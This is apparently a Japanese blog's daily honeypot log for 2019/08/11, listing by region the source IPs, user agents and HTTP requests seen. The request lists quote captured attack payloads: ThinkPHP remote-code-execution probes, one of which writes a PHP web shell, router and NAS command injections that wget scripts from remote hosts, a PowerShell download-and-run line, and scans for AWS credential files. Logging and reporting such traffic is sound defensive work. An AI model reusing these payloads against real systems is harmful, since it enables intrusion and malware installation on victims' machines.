コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2019/08/11 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2019/08/11分です。

特徴
Region:AP

AVM Fritz!boxの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
awsのcredential情報に対するスキャン行為
masscanでのスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。

Region:US

ReadyNAS Surveillanceの脆弱性を狙うアクセス
を確認しました。

Region:EU

ThinkPHPの脆弱性を狙うアクセス
awsのcredential情報に対するスキャン行為
masscanでのスキャン行為
を確認しました。

アクセス数推移

AP:総アクセス数:31 (前日比:-18)
US:総アクセス数:12 (前日比:-18)
EU:総アクセス数:33 (前日比:+24)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region:AP

送信元IPアドレス一覧

件数 送信元IPアドレス
3 110.249.212.46 China
4 183.131.18.170 China
5 185.100.87.250 Romania
1 185.39.89.101 Germany
1 209.141.43.244 United States
3 5.8.10.202 Russia
1 61.110.186.68 South Korea
1 61.219.11.153 Taiwan
1 66.249.71.121 United States
1 66.249.75.57 United States
3 77.247.110.165 Netherlands
3 77.247.110.69 Netherlands
1 89.248.174.144 Netherlands
3 91.121.209.213 France

UserAgent一覧

件数 UserAgent
12 -
4 Go-http-client/1.1
3 masscan/1.0 (https://github.com/robertdavidgraham/masscan)
2 Mozilla/5.0
2 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
5 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
3 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GET /admin-console/login.seam HTTP/1.1\n
1 GET /.aws/credentials HTTP/1.0
2 GET /.aws/credentials HTTP/1.1
1 GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20wget%20http://91[.]92[.]66[.]192/xd.sh%20%26 HTTP/1.1
1 GET /evox/about HTTP/1.1]
1 GET /HNAP1 HTTP/1.1
3 GET http://110[.]249[.]212[.]46/testget?q=23333&port=80 HTTP/1.1
1 GET /nmaplowercheck1565401025 HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /webadmin/script?command= busybox|HTTP/1.1
3 HEAD /acadmin.php HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
4 HEAD /robots.txt HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /TP/index.php?s=captcha HTTP/1.1
Region:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 112.3.28.71 China
5 185.100.87.246 Romania
1 195.29.90.142 Croatia
1 54.39.209.227 Canada
1 5.8.10.202 Russia
1 61.219.11.153 Taiwan
1 77.247.110.165 Netherlands
1 77.247.110.69 Netherlands

UserAgent一覧

件数 UserAgent
5 -
1 Go-http-client/1.1
1 Mozilla/5.0
5 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GET /evox/about HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /nmaplowercheck1565399584 HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185[.]164[.]72[.]155/richard;
1 GET /xmlrpc.php HTTP/1.1
1 HEAD /acadmin.php HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
1 POST /sdk HTTP/1.1
Region:EU

送信元IPアドレス一覧

件数 送信元IPアドレス
1 112.3.28.71 China
3 180.166.58.2 China
10 183.131.18.169 China
1 183.251.100.145 China
4 183.251.100.146 China
1 183.251.100.147 China
4 183.251.100.148 China
4 209.141.53.82 United States
1 5.8.10.202 Russia
1 61.219.11.153 Taiwan
1 77.247.110.165 Netherlands
1 77.247.110.69 Netherlands
1 91.121.209.213 France

UserAgent一覧

件数 UserAgent
8 -
3 Go-http-client/1.1
1 masscan/1.0 (https://github.com/robertdavidgraham/masscan)
3 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
18 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GET /.aws/credentials HTTP/1.0
2 GET /elrekt.php HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
2 GET /index.php HTTP/1.1
2 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1\n
1 GET /phpmyadmin2/scripts/setup.php HTTP/1.1\n
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1\n
1 GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://wiu[.]fxxxxxxk[.]me/download.exe','%SystemRoot%/Temp/gniskhechzvynsu22693.exe');start%20%SystemRoot%/Temp/gniskhechzvynsu22693.exe HTTP/1.1
2 GET /public/index.php HTTP/1.1
1 GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://wiu[.]fxxxxxxk[.]me/download.exe','%SystemRoot%/Temp/gniskhechzvynsu22693.exe');start%20%SystemRoot%/Temp/gniskhechzvynsu22693.exe HTTP/1.1
1 GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1
1 GET /scripts/setup.php HTTP/1.1\n
2 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /xmlrpc.php HTTP/1.1
1 HEAD /acadmin.php HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
2 POST /index.php?s=captcha HTTP/1.1